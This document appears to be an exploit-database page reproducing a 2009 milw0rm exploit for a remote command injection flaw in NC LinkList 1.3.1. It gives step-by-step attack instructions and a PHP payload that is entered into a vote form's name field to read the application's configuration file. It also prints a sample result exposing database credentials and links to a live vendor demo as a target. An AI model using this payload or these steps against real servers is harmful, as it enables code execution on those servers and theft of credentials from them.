header-logo
Suggest Exploit
vendor:
NC LinkList
by:
ThE g0bL!N
9,3
CVSS
HIGH
Remote Command Injection
78
CWE
Product Name: NC LinkList
Affected Version From: 1.3.1
Affected Version To: 1.3.1
Patch Exists: YES
Related CWE: N/A
CPE: a:nc-soft:nc_linklist:1.3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

NC LinkList 1.3.1 Remote Command injection Exploit

NC LinkList 1.3.1 is vulnerable to a remote command injection vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The attacker can inject arbitrary commands which will be executed on the server side. The attacker can also read the configuration file of the application by sending a crafted HTTP request.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.
Source

Exploit-DB raw data:

--------------------------------------------------------------
NC LinkList 1.3.1 Remote Command injection Exploit
---------------------------------------------------------------
Founder :ThE g0bL!N
Vendor:http://www.php-linkverzeichnis.de
Thank You Very Much His0k4
Note: You Can choose Any Function in Php :)
---------------------------------------------------------------
Exploit:
--------
    1) Go To Url:
    ---------
              http://wwww.victim.co.il/[path]/index.php?action=vote&link=$number of links
     
 2) Write In:
     --------
             Ihr Name:  <? readfile("./inc/config.inc.php"); ?>.
    Ihre E-Mail: x0q@hotmail.fr
    Ihre Bewertung:10 sehr  Gut  # bel Hendia allah yahfad wa youstour
             Kommentar: Hacked By ThE g0bL!N
              
  3) Post The Topic:
        --------------
 
  4) Then Go to:
     -----------
  http://www.victim.co.il/[path]/index.php?action=show&view=votings&link=$number of links .
  
  5) View Source:
     -----------
  
Exapmle:
--------
  1)http://wwww.victim.co.il/[path]/index.php?action=vote&link=20000
  2)http://www.victim.co.il/[path]/index.php?action=show&view=votings&link=20000
  
Result:
--------
  $db_host = "localhost";            // MySQL - Hostname
$db_user = "d009b9e8";            // MySQL - Username
$db_pwd  = "iwkpwd99";            // MySQL - Passwort
$db_name = "d009b9e8";           // MySQL - database
Demo:
----
http://www.php-linkverzeichnis.de/demo/index.php?action=vote&link=800
----------------------------------------------------------------
Greetz : His0k4 Dos-Dz TeaM Snakes TeaM And All My Freinds (dz)
-----------------------------------------------------------------

# milw0rm.com [2009-05-20]

Navigation

Suggest Exploit

Services By CQR